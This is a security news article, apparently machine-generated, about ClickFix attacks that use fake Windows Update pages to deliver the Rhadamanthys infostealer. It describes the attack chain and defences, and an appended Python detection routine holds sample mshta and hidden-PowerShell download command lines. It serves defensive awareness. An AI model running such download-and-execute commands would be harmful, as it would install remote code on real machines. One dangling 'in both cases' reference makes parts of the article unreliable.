Ethical Hacking News

New Wave of ClickFix Attacks Swings at Windows Update Screens



A new wave of ClickFix attacks has emerged, using fake Windows updates to trick users into running malicious commands on their own machines. The attackers are using steganography to deliver infostealing malware, including Rhadamanthys. To defend against these attacks, organizations should block the Windows Run box and train employees on how the ClickFix technique works, as well as implement endpoint detection and response tools.

  • ClickFix attacks use fake Windows updates as a lure for unsuspecting victims.
  • The attackers use steganography to encode malicious code into PNG images.
  • The latest attack wave targets users who visit malicious websites displaying a blue Windows Update screen.
  • The malware deployed is Rhadamanthys infostealing malware that steals login credentials.
  • Organizations can defend against ClickFix attacks by blocking the Windows Run box and using endpoint detection tools.



ClickFix attacks have long been a thorn in the side of cybersecurity professionals, using social engineering to trick users into running malicious commands on their own machines. In recent months, these attacks have evolved to use fake Windows updates as a lure for unsuspecting victims. This latest wave uses convincing phishing screens that mimic real Windows updates, with the goal of stealing login credentials from those who fall prey.

According to Huntress security analysts Ben Folland and Anna Pham, the recent attacks are moving away from the traditional robot-check lures and instead using fake Windows Update screens. The attackers use steganography to hide malicious code inside PNG images, which are then used to deliver infostealing malware such as Rhadamanthys.

The latest attack wave targets users who visit malicious websites that force the browser into full-screen mode and display a blue Windows Update screen, similar to the one shared on social media. The page tells victims to install a "critical security update" via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the supplied command. Running the command kicks off a multi-stage execution chain that begins with an mshta.exe command containing a URL with an IP address, where the second octet is always hex-encoded.

The URL serves PowerShell code that contains a .NET assembly, which is dynamically decrypted and reflectively loaded. That in turn deploys another .NET payload – a steganographic loader that extracts Donut-packed shellcode hidden inside the pixel data of PNG images.

In both cases, the malicious code results in Rhadamanthys infostealing malware being deployed on the victims' machines, swiping their login credentials.

Organizations can defend against ClickFix attacks by blocking the Windows Run box and training employees on how the ClickFix technique works – a real CAPTCHA or Windows Update will never require a user to paste and run commands. Additionally, use endpoint detection and response tools to monitor for explorer.exe spawning mshta.exe, powershell.exe, or other binaries with unexpected command lines.

The Huntress researchers also noted that the source code of the Windows Update lure site contains comments in Russian, which could indicate that the attackers are affiliated with a group operating out of Russia. The fact that multiple active domains continue to host the Windows Update lure page associated with the Rhadamanthys campaign, despite the Operation Endgame law enforcement takedowns announced November 13, indicates that this threat remains active.

In light of these attacks, it is essential for organizations to strengthen their defenses against ClickFix and other types of phishing attacks. Employing a combination of security awareness training, endpoint protection tools, and robust network monitoring can significantly reduce the risk of falling prey to such attacks.
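As an added illustration of the detection guidance above (this is example code written for this page, not code from the article or from Huntress), the following Python triage routine runs over constructed Sysmon-style process-creation events. It flags explorer.exe spawning mshta.exe or powershell.exe, and normalizes URLs whose IP address carries a hex-encoded octet so the real dotted-decimal address can be matched and blocked; the sample events, hostnames and IP addresses are constructed (documentation ranges), not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style);
# not telemetry from the campaign described in the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.0x33.100.23/update"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\helper.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://203.0.113.40/x"'},
]

# Binaries a Run-box paste typically launches directly under explorer.exe.
SUSPECT_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://([^/\s\"']+)")
HEX_OCTET_RE = re.compile(r"^0x[0-9a-f]+$", re.I)

def normalize_host(host):
    """Return (dotted-decimal IP, had_hex_octet); non-IP hosts come back unchanged.
    Windows URL parsing accepts 0x-prefixed octets, so 198.0x33.100.23 is 198.51.100.23."""
    parts = host.split(".")
    if len(parts) != 4:
        return host, False
    had_hex = any(HEX_OCTET_RE.match(p) for p in parts)
    try:
        octets = [int(p, 16) if HEX_OCTET_RE.match(p) else int(p) for p in parts]
    except ValueError:
        return host, False
    if any(not 0 <= o <= 255 for o in octets):
        return host, False
    return ".".join(map(str, octets)), had_hex

def triage(event):
    """Return the list of reasons an event is suspicious; an empty list means no match."""
    reasons = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe" and child in SUSPECT_CHILDREN:
        reasons.append(f"explorer.exe spawned {child} (Run-box pattern)")
    for host in URL_RE.findall(event["cmdline"]):
        ip, had_hex = normalize_host(host)
        if had_hex:
            reasons.append(f"hex-encoded IP octet in URL: {host} -> {ip}")
        if child == "mshta.exe":
            reasons.append(f"mshta.exe fetching remote content from {ip}")
    return reasons
```

The third sample event shows why the parent-process condition matters: mshta.exe launched by a service with a local .hta produces no hit, while the Run-box launch with a remote, hex-obfuscated URL produces three.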



    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-Wave-of-ClickFix-Attacks-Swings-at-Windows-Update-Screens-ehn.shtml

  • https://go.theregister.com/feed/www.theregister.com/2025/11/24/clickfix_attack_infostealers_images/

  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

  • https://cybersecuritynews.com/clickfix-attack-fake-os-update/

  • https://www.bitdefender.com/en-us/blog/hotforsecurity/operation-endgame-disrupts-rhadamanthys-information-stealing-malware

  • https://www.proofpoint.com/us/blog/threat-insight/operation-endgame-quakes-rhadamanthys

  • https://www.pcrisk.com/removal-guides/12894-donut-ransomware

  • https://unit42.paloaltonetworks.com/donut-malware-analysis-tutorial/


  • Published: Mon Nov 24 17:09:15 2025 by llama3.2 3B Q4_K_M